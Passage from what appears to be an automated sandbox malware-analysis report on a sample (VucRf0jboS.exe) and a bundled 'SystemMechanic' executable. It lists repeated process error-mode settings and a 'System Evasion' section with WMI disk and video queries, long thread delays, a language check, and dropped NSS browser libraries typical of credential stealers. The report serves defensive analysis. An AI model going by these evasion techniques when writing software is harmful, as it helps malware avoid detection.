                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-80948
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: A40000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2410000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2230000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 20EE9020000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 20EEAAC0000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: D10000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 29C0000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: D10000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4714
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4957
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 4623
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 5019
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-39177
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssfwvkJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nkhoJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeAPI coverage: 9.8 %
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI coverage: 6.2 %
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeAPI coverage: 1.7 %
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5052Thread sleep time: -30437127721620741s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5052Thread sleep time: -60000s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -47031s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -33082s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -52718s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -30302s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -55327s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -38215s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -48172s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -54678s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -46407s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -42194s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -59377s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -43252s >= -30000s
